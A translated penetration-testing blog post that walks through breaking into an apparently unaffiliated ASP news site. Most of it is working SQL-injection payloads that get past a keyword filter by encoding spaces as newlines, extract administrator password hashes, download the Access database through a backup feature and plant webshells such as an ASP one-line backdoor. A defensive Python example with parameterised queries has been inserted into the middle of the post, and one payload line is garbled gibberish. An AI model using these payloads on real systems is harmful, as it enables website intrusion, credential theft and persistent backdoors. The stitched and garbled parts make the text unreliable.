Access Database: Manually Bypassing a Universal Anti-injection System
by antian365 Remnant Maple Simeon
The penetration process reproduces a range of security techniques: from discovering a SQL injection point, to bypassing the common anti-injection code, to obtaining the administrator password and the database through the injection and, where conditions allow, a Webshell. This article also summarises the key techniques for obtaining a Webshell from an Access database.
1.1 Getting target information
Search Baidu for the keyword "news.asp?id=", pick a record at random from the results and open it (Figure 1). Check that the site can be accessed normally, then press F9 in Firefox to open HackBar.
Figure 1: testing the target site
1.2 Testing for the presence of SQL injection
Open a news link on the site at random, http://www.xxxxx.com/news.asp?id=1172, and append and 1=2 and and 1=1 to the address to determine whether an injection exists (Figure 2). After clicking Execute, the page reports the presence of an "SQL Universal anti-injection system".
Figure 2: the SQL Universal anti-injection system is present
Append "-0" and "/" to the address to test. Opening "http://www.xxxxx.com/news.asp?id=1172/" gives the result in Figure 3, while opening "http://www.xxxxx.com/news.asp?id=1172-0" gives the result in Figure 4: the difference shows an obvious SQL injection.
Figure 3: no content shown
Figure 4: content shown
1.3 Bypassing the SQL anti-injection system
1. POST submission cannot bypass it
Enter and 1=1 and and 1=2 in the POST data, tick "Enable Post Data" and click "Execute" to test. Figure 5 shows no change in the result, so a plain POST submission does not bypass the filter.
Figure 5: POST submission cannot bypass the filter
2. Replacing the space to bypass
Whether or not POST mode is used, a friend suggested that %09 (the tab character) could bypass the filter; testing shows it cannot (Figure 6). Replacing each space with %0a (the newline character) successfully bypasses it (Figure 7).
Figure 6: %09 cannot bypass the filter
Figure 7: successful bypass
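The newline substitution in section 1.3 works because the filter matches keyword patterns that contain literal spaces, so any other whitespace character between the tokens slips past it. The following Python is an added example, not code from the original post or from the anti-injection script it describes: a constructed model of such a filter, the same pattern list applied after whitespace normalisation, and a request handler that needs no filter at all because it validates the id as an integer and binds it as a query parameter. SQLite in memory stands in for the site's Access database (an assumption for the demonstration), and the news and admin tables and their rows are constructed here.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed model of a keyword-based "universal anti-injection" filter (not the
# real script from the post): substring patterns that contain literal spaces.
NAIVE_PATTERNS = ("and 1=1", "and 1=2", "order by", "union select", "select count")


def naive_filter_blocks(query_string: str) -> bool:
    """Block if any pattern appears in the URL-decoded, lower-cased query string."""
    decoded = unquote(query_string).lower()
    return any(p in decoded for p in NAIVE_PATTERNS)


_WS = re.compile(r"[\s\x00]+")            # space, tab (%09), newline (%0a), CR, NUL, and runs
_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # inline SQL comments used as separators


def normalize(query_string: str) -> str:
    """Decode twice (catches double encoding), strip inline comments, collapse whitespace."""
    decoded = unquote(unquote(query_string))
    decoded = _COMMENT.sub(" ", decoded)
    return _WS.sub(" ", decoded).strip().lower()


def normalized_filter_blocks(query_string: str) -> bool:
    """Same pattern list as the naive filter, matched against the normalized form."""
    return any(p in normalize(query_string) for p in NAIVE_PATTERNS)


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's Access database, populated with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE admin (id INTEGER, user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1158, "news item 1158"), (1172, "news item 1172")])
    conn.execute("INSERT INTO admin VALUES (1, 'demo-admin', 'demo-hash')")
    return conn


def vulnerable_fetch(conn: sqlite3.Connection, raw_id: str):
    """The pattern behind news.asp?id=: the parameter is concatenated into the SQL text."""
    return conn.execute("SELECT id, title FROM news WHERE id=" + raw_id).fetchall()


def safe_fetch(conn: sqlite3.Connection, raw_id: str):
    """Hardened handler: validate the type first, then bind the value as a parameter."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return []  # "1172/", "1172-0" and "1172\nunion ..." are all rejected here
    return conn.execute("SELECT id, title FROM news WHERE id=?", (news_id,)).fetchall()
```

Normalising whitespace closes the %09, %0a, %0d, double-encoding and comment variants of the same payload, but a keyword blacklist remains a blacklist; the parameterised handler is the actual fix, and the normalised check is more useful for logging and alerting than as the only line of defence.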
1.4 Getting the database type, tables and fields
(1) Determine the database type
Use the error behaviour of and (select count(*) from sysobjects)>0 and and (select count(*) from msysobjects)>0 to determine which database the site uses. If the database is SQL Server, the page runs normally with the first statement and abnormally with the second; if it is Access, both are abnormal. Submit the two in turn via POST:
AND%0A (Select%0acount (*)%0afrom%0asysobjects) >0
AND%0A (Select%0acount (*)%0afrom%0amsysobjects) >0
Both results show "there is no content yet!" where the content for id=1158 should appear: both statements caused an error, which indicates an Access database.
(2) Determine the number of columns with ORDER BY
id=1172%0aorder%0aby%0a23 normal
id=1172%0aorder%0aby%0a24 error
order by 23 is normal and order by 24 errors, so the query returns 23 columns.
(3) Determine whether the admin table exists
and (select COUNT (*) from admin) >0
AND%0A (Select%0acount (*)%0afrom%0aadmin) >0
(4) Determine whether the user and pass fields exist
and (select count(username) from admin)>0
and (select count(password) from admin)>0
The transformed (newline-encoded) statements:
and%0a (select%0acount (user)%0afrom%0aadmin) >0
AND%0A (Select%0acount (pass)%0afrom%0aadmin) >0
Testing the admin table for the uid and id columns: uid errors (Figure 8), id is normal (Figure 9).
Figure 8: uid does not exist
Figure 9: id exists
1.5 Getting the administrator password
Submit id=1158%0aunion%0aselect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin to get the password of the ADMIN-DH user, "5ed9ff1d48e059b50db232f497b35b45" (Figure 10). Logging in to the backend shows that this user has low privileges, so the passwords of the other administrator users are also needed. Execute:
id=1158%0aunion%0aselect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin%0awhere%0aid=1 to get the password of the user with ID 1 (Figure 11).
Figure 10: getting the ADMIN-DH user's password
Figure 11: getting the administrator zzchxj user's password
1.6 Getting the database
(1) Obtaining database backup information
A database backup function exists in the backend management (Figure 12). The backup page shows the current database path, the backup database directory, the backup database name and similar information.
Figure 12: backing up the database
(2) Get the real database name with the compress function
Click Compress (Figure 13) to obtain the real name and path of the database: "/data-2016/@@ zzfcthotfixz ###.asp".
Figure 13: getting the real path and name of the database
(3) Back up and get the database
Fill in "../data-2016/@@ zzfcthotfixz ###.asp" as the current database path and "db1.mdb" as the backup database name (Figure 14). The backup succeeds, and the backed-up database is at the server path D:\virtualhost\*********\www\ahs*****admin\databackup\db1.mdb, i.e. at the URL:
http://www.xxxxx.com/ahszhdzzcadmin/Databackup/db1.mdb
Figure 14: backing up the database
1.8 Access database: methods of getting a Webshell
(1) Query export method
create table cmd (a varchar(50))
insert into cmd (a) values ('<%executerequest (CHR)%>')
select * into [a] in 'C:\wwwroot\1.asa;x.xls' 'Excel 4.0;' from cmd
drop table cmd
Then connect directly with China Chopper (菜刀) to http://www.antian365.com/1.asa;x.xls
(2) Database backup
In the message board or any other place where content can be written, insert "┼ disruptively 畣 choky longoza enemy Kozasa ∨≡┩ 愾", then obtain a backdoor with password a through the database backup.
(3) Database backup of an image
Upload an image with a one-line backdoor embedded to the site, obtain the exact address of the image, then run a backup with the source set to the image file's location and the backup file named, for example, /databacp/1.asp, to get a Webshell.
This article comes from the "Simeon Technology column" blog; please keep this source when reproducing it: http://simeon.blog.51cto.com/18680/1927496